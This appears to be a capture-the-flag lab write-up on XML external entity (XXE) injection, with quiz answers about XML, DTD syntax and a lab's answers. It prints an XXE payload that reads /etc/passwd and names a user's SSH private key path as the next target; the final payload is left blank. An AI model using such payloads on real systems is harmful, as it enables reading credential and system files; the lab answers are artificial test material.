Task 12: XML External Entity
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.Task 13: XML External Entity — eXtensible Markup Language
a) Full form of XML
eXtensible Markup Language
b) Is it compulsory to have XML prolog in XML documents?
No
{<?xml version="1.0" encoding="UTF-8"?>
This line is called XML prolog and it specifies the XML version and the encoding used in the XML document. This line is not compulsory to use but it is considered a `good practice` to put that line in all your XML documents.}
c) Can we validate XML documents against a schema?
Yes
{“ XML allows validation using DTD and Schema. This validation ensures that the XML document is free from any syntax error.”}
d) How can you specify XML version and encoding in XML document?
XML Prolog
Task 14: XML External Entity — DTD
a) How do you define a new ELEMENT?
!ELEMENT
b) How do you define a ROOT element?
!DOCTYPE
c) How do you define a new ENTITY?
!ENTITY
Task 15: XML External Entity — XXE Payload
payload : <?xml version=”1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM ‘file:///etc/passwd’>]>
<root>&read;</root>
execute it on the machine ip website:
The website is vulnerable to XXE attack and hence it is showing the content of /etc/passwd file.
Task 16: XML External Entity — Exploiting
c) What is the name of the user in /etc/passwd
falcon
d) Where is falcon’s SSH key located?
/home/falcon/.ssh/id_rsa
{By default, the private key is stored in ~/. ssh/id_rsa and the public key is stored in ~/. ssh/id_rsa. pub}
e) What are the first 18 characters for falcon’s private key
Use payload:
Output:
